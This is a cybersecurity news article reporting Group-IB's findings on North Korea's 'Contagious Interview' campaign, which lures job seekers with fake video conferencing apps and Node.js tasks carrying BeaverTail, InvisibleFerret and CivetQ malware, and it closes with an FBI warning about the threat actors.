(Source-newyorker.com_.jpg)
North Korean threat actors have once again employed sophisticated tactics to target unsuspecting job seekers, using fake video conferencing apps to breach developer systems in a financially motivated cyber campaign known as “Contagious Interview.”
Cyber Campaigns Targeting Job Seekers and Fake Video Conferencing Apps
A recent report by Singapore-based cybersecurity firm Group-IB, revealed that a North Korean threat group has been using fraudulent Windows video conferencing applications to infiltrate developer systems. This latest attack wave, discovered in mid-August 2024, is part of a larger campaign called “Contagious Interview,” also tracked as DEV#POPPER. It is believed to be orchestrated by a North Korean actor known as Famous Chollima, as per CrowdStrike’s monitoring.
The attacks begin by posing as job recruiters and initiating fake job interviews in fake video conferencing apps. The victims, often job seekers, are tricked into downloading a Node.js project containing malicious software, including the BeaverTail malware downloader. This malware delivers a cross-platform Python backdoor, InvisibleFerret, which allows hackers to remotely control systems, log keystrokes, and steal sensitive information from web browsers.
The hacking group has recently evolved its methods by using both Windows and macOS installers to deliver malware disguised as legitimate fake Video Conferencing Apps. In earlier instances, these fake installers mimicked MiroTalk software, but in July 2024, the group switched to impersonating FreeConference.com. The installers are spread through deceptive websites such as freeconference[.]io and mirotalk[.]net, making it harder for victims to recognize the threat.
Expanding Tactics and Targets
According to Group-IB’s findings, the hackers have expanded their operations by targeting job search platforms like LinkedIn, Upwork, and others. Once they initiate contact with potential victims, they move conversations to encrypted messaging apps like Telegram, where they persuade the victims to download fake video conferencing apps or a Node.js project as part of a technical task.
In addition to these tactics, the campaign has been observed injecting malicious JavaScript into cryptocurrency and gaming-related repositories. This JavaScript is designed to retrieve additional malware code from specific domains, such as ipcheck[.]cloud or regioncheck[.]net. Researchers from Phylum, a software supply chain security firm, also identified similar tactics in npm packages, suggesting that the group is using multiple attack vectors to spread its malware.
Another notable aspect of this campaign is the enhanced capabilities of BeaverTail, which now targets a wider range of cryptocurrency wallet extensions, such as Kaikas, Rabby, and Exodus Web3. Additionally, the malware uses AnyDesk to establish persistence on compromised systems. These developments signal that the hackers are continually improving their tools and finding more effective ways to steal sensitive information.
FBI Warning and Evolving Cyber Threats
As part of their ongoing campaign, the hackers have also developed a new toolset known as CivetQ, a set of Python scripts designed to steal data from a wide range of applications, including web browsers and even Microsoft Sticky Notes. This malware can extract sensitive information stored in unencrypted databases, such as cookies, keystrokes, and clipboard content, from a total of 74 different browser extensions.
Security researcher Sharmine Low from Group-IB emphasized that the campaign is under constant refinement, with the threat actors frequently updating their tools and expanding their reach across multiple platforms. Low noted, “Lazarus has upgraded their tactics, upgraded their tools, and found better ways to conceal their activities. Their attacks have become increasingly creative.”
In light of these developments, the U.S. Federal Bureau of Investigation (FBI) has issued warnings about North Korean cyber actors targeting the cryptocurrency industry with sophisticated social engineering schemes. These hackers are known for their complex strategies, using professional networking platforms to identify and compromise their victims. The FBI also warned that North Korean cyber actors are particularly focused on decentralized finance (DeFi) businesses, attempting to gain unauthorized access to company networks through elaborate social engineering techniques.
As this campaign continues to evolve, cybersecurity experts urge individuals and organizations to remain vigilant, particularly when engaging in job searches or interacting with cryptocurrency platforms.
Also Read: CyberPro Magazine
